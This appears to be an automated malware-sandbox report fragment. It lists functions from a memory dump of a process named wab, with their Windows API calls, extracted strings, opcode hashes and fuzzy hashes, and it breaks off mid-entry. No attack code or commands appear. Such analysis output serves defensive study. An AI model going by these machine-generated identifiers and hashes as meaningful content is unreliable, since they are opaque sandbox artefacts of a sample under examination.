                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                              • String ID: \systemroot
                                                              • API String ID: 4173585201-1821301763
                                                              • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                              • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                              • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                              • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                              Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: wcscpy
                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                              • API String ID: 1284135714-318151290
                                                              • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                              • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                              • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                              • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                              Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                              • String ID: 0$6
                                                              • API String ID: 4066108131-3849865405
                                                              • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                              • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                              • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                              • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                              Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004082EF
                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                              • memset.MSVCRT ref: 00408362
                                                              • memset.MSVCRT ref: 00408377
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 290601579-0
                                                              • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                              • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                              • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                              • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                              Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memchrmemset
                                                              • String ID: PD$PD
                                                              • API String ID: 1581201632-2312785699
                                                              • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                              • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                              • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                              • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                              Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                              • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                              • GetDC.USER32(00000000), ref: 00409F6E
                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                              • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                              • GetParent.USER32(?), ref: 00409FA5
                                                              • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                              • String ID:
                                                              • API String ID: 2163313125-0
                                                              • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                              • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                              • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                              • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                              Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@$wcslen
                                                              • String ID:
                                                              • API String ID: 239872665-3916222277
                                                              • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                              • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                              • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                              • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                              Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$_snwprintfmemset
                                                              • String ID: %s (%s)$YV@
                                                              • API String ID: 3979103747-598926743
                                                              • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                              • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                              • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                              • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                              Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                              • wcslen.MSVCRT ref: 0040A6B1
                                                              • wcscpy.MSVCRT ref: 0040A6C1
                                                              • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                              • wcscpy.MSVCRT ref: 0040A6DB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                              • String ID: Unknown Error$netmsg.dll
                                                              • API String ID: 2767993716-572158859
                                                              • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                              • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                              • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                              • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                              Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              • wcscpy.MSVCRT ref: 0040DAFB
                                                              • wcscpy.MSVCRT ref: 0040DB0B
                                                              • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfilewcscpy$AttributesFileString
                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                              • API String ID: 3176057301-2039793938
                                                              • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                              • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                              • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                              • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                              Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • unable to open database: %s, xrefs: 0042F84E
                                                              • database is already attached, xrefs: 0042F721
                                                              • out of memory, xrefs: 0042F865
                                                              • too many attached databases - max %d, xrefs: 0042F64D
                                                              • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                              • cannot ATTACH database within transaction, xrefs: 0042F663
                                                              • database %s is already in use, xrefs: 0042F6C5
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                              • API String ID: 1297977491-2001300268
                                                              • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                              • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                              • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                              • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                              Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                              • memcpy.MSVCRT ref: 0040EB80
                                                              • memcpy.MSVCRT ref: 0040EB94
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                              • String ID: ($d
                                                              • API String ID: 1140211610-1915259565
                                                              • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                              • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                              • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                              • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                              Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                              • Sleep.KERNEL32(00000001), ref: 004178E9
                                                              • GetLastError.KERNEL32 ref: 004178FB
                                                              • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$ErrorLastLockSleepUnlock
                                                              • String ID:
                                                              • API String ID: 3015003838-0
                                                              • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                              • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                              • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                              • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                              Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00407E44
                                                              • memset.MSVCRT ref: 00407E5B
                                                              • _mbscpy.MSVCRT ref: 00407E7E
                                                              • _mbscpy.MSVCRT ref: 00407ED7
                                                              • _mbscpy.MSVCRT ref: 00407EEE
                                                              • _mbscpy.MSVCRT ref: 00407F01
                                                              • wcscpy.MSVCRT ref: 00407F10
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                              • String ID:
                                                              • API String ID: 59245283-0
                                                              • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                              • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                              • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                              • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                              Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                              • GetLastError.KERNEL32 ref: 0041855C
                                                              • Sleep.KERNEL32(00000064), ref: 00418571
                                                              • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                              • GetLastError.KERNEL32 ref: 0041858E
                                                              • Sleep.KERNEL32(00000064), ref: 004185A3
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                              • String ID:
                                                              • API String ID: 3467550082-0
                                                              • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                              • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                              • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                              • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                              Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                              • API String ID: 3510742995-3273207271
                                                              • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                              • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                              • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                              • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                              Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                              • memset.MSVCRT ref: 00413ADC
                                                              • memset.MSVCRT ref: 00413AEC
                                                                • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                              • memset.MSVCRT ref: 00413BD7
                                                              • wcscpy.MSVCRT ref: 00413BF8
                                                              • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                              • String ID: 3A
                                                              • API String ID: 3300951397-293699754
                                                              • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                              • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                              • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                              • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                              Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                              • wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                              • wcslen.MSVCRT ref: 0040D1D3
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                              • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                              • memcpy.MSVCRT ref: 0040D24C
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                              • String ID: strings
                                                              • API String ID: 3166385802-3030018805
                                                              • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                              • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                              • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                              • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                              Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00411AF6
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                              • wcsrchr.MSVCRT ref: 00411B14
                                                              • wcscat.MSVCRT ref: 00411B2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FileModuleNamememsetwcscatwcsrchr
                                                              • String ID: AE$.cfg$General$EA
                                                              • API String ID: 776488737-1622828088
                                                              • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                              • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                              • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                              • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                              Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040D8BD
                                                              • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                              • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                              • memset.MSVCRT ref: 0040D906
                                                              • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                              • _wcsicmp.MSVCRT ref: 0040D92F
                                                                • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                              • String ID: sysdatetimepick32
                                                              • API String ID: 1028950076-4169760276
                                                              • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                              • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                              • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                              • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                              Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: -journal$-wal
                                                              • API String ID: 438689982-2894717839
                                                              • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                              • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                              • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                              • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                              Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C27
